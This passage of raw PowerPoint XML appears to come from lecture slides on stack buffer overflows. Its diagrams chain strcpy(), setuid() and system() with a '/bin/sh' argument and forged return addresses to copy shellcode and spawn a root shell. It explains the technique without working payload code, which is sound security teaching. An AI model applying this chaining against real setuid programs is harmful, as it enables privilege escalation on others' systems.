                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/bin/sh0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205281" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="4800600"/>
            <a:ext cx="0" cy="68580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5282" name="Line 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6705600" y="23431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83" name="Line 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8610600" y="23431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84" name="Line 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8610600" y="3200400"/>
            <a:ext cx="0" cy="20002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85" name="Line 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6705600" y="3200400"/>
            <a:ext cx="0" cy="20002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5287" name="Rectangle 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="29146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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = 0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205288" name="Rectangle 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="26289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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/bin/sh0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205289" name="Line 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7620000" y="3143250"/>
            <a:ext cx="0" cy="45720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5290" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="3657601"/>
            <a:ext cx="1531188" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>This is the address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> believes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>it was called from</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205291" name="Freeform 43"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="5200650"/>
            <a:ext cx="1219200" cy="285750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="384" y="240"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="768" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="768" h="240">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="120"/>
                  <a:pt x="256" y="240"/>
                  <a:pt x="384" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="512" y="240"/>
                  <a:pt x="640" y="120"/>
                  <a:pt x="768" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="med" len="me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5292" name="Freeform 44"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="5200650"/>
            <a:ext cx="1219200" cy="285750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="384" y="240"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="768" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="768" h="240">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="120"/>
                  <a:pt x="256" y="240"/>
                  <a:pt x="384" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="512" y="240"/>
                  <a:pt x="640" y="120"/>
                  <a:pt x="768" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="med" len="me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5293" name="Freeform 45"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="5200650"/>
            <a:ext cx="1219200" cy="285750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="384" y="240"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="768" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="768" h="240">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="120"/>
                  <a:pt x="256" y="240"/>
                  <a:pt x="384" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="512" y="240"/>
                  <a:pt x="640" y="120"/>
                  <a:pt x="768" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="med" len="me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5294" name="Text Box 46"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="5486401"/>
            <a:ext cx="663964" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205295" name="Text Box 47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505202" y="5543551"/>
            <a:ext cx="1522725" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>original function’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205296" name="Text Box 48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019801" y="5543551"/>
            <a:ext cx="960071" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155923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5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52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052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52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52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52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052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52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052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52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052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52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052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052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0529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052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052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052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052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0527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52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0527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0528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0529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0529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0528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0528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0528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0528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0528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0528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052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528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05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59" grpId="0" animBg="1"/>
      <p:bldP spid="1205260" grpId="0" animBg="1"/>
      <p:bldP spid="1205261" grpId="0" animBg="1"/>
      <p:bldP spid="1205262" grpId="0" animBg="1"/>
      <p:bldP spid="1205263" grpId="0" animBg="1"/>
      <p:bldP spid="1205264" grpId="0" animBg="1"/>
      <p:bldP spid="1205265" grpId="0" animBg="1"/>
      <p:bldP spid="1205266" grpId="0" animBg="1"/>
      <p:bldP spid="1205267" grpId="0" animBg="1"/>
      <p:bldP spid="1205268" grpId="0" animBg="1"/>
      <p:bldP spid="1205269" grpId="0" animBg="1"/>
      <p:bldP spid="1205273" grpId="0" animBg="1"/>
      <p:bldP spid="1205274" grpId="0" animBg="1"/>
      <p:bldP spid="1205275" grpId="0" animBg="1"/>
      <p:bldP spid="1205276" grpId="0" animBg="1"/>
      <p:bldP spid="1205277" grpId="0" animBg="1"/>
      <p:bldP spid="1205278" grpId="0" animBg="1"/>
      <p:bldP spid="1205279" grpId="0" animBg="1"/>
      <p:bldP spid="1205280" grpId="0" animBg="1"/>
      <p:bldP spid="1205281" grpId="0" animBg="1"/>
      <p:bldP spid="1205282" grpId="0" animBg="1"/>
      <p:bldP spid="1205283" grpId="0" animBg="1"/>
      <p:bldP spid="1205284" grpId="0" animBg="1"/>
      <p:bldP spid="1205285" grpId="0" animBg="1"/>
      <p:bldP spid="1205287" grpId="0" animBg="1"/>
      <p:bldP spid="1205288" grpId="0" animBg="1"/>
      <p:bldP spid="1205289" grpId="0" animBg="1"/>
      <p:bldP spid="1205290" grpId="0"/>
      <p:bldP spid="1205291" grpId="0" animBg="1"/>
      <p:bldP spid="1205292" grpId="0" animBg="1"/>
      <p:bldP spid="1205293" grpId="0" animBg="1"/>
      <p:bldP spid="1205294" grpId="0"/>
      <p:bldP spid="1205295" grpId="0"/>
      <p:bldP spid="1205296" grpId="0"/>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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copying the Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206275" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="37719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saved ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206276" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="34861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saved eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206277" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="4057650"/>
            <a:ext cx="1905000" cy="8572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buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206278" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="4800600"/>
            <a:ext cx="0" cy="68580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6279" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="304800" y="2343150"/>
            <a:ext cx="0" cy="11430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6280" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2209800" y="2343150"/>
            <a:ext cx="0" cy="11430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6281" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2209800" y="49149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6282" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="304800" y="49149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6283" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="37719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garbage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206284" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="34861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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206285" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="4057650"/>
            <a:ext cx="1905000" cy="8572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garbage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206286" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="4800600"/>
            <a:ext cx="0" cy="68580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6287" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438400" y="23431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6288" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4343400" y="23431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6289" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4343400" y="49149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6290" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438400" y="49149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6291" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="32004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exec area</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206292" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="29146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exec area</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206293" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="26289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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206294" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="4800600"/>
            <a:ext cx="0" cy="68580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6295" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4572000" y="23431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6296" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6477000" y="23431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6297" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6477000" y="3486150"/>
            <a:ext cx="0" cy="17145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6298" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4572000" y="3486150"/>
            <a:ext cx="0" cy="17145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6299" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="32004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return address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206300" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="29146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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>dest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206301" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="26289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address of source</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206309" name="Line 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5410200" y="3543300"/>
            <a:ext cx="0" cy="45720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6310" name="Text Box 38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="4000501"/>
            <a:ext cx="1479892" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>This is the address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> believes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>it was called from</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206311" name="Freeform 39"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="5200650"/>
            <a:ext cx="1219200" cy="285750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
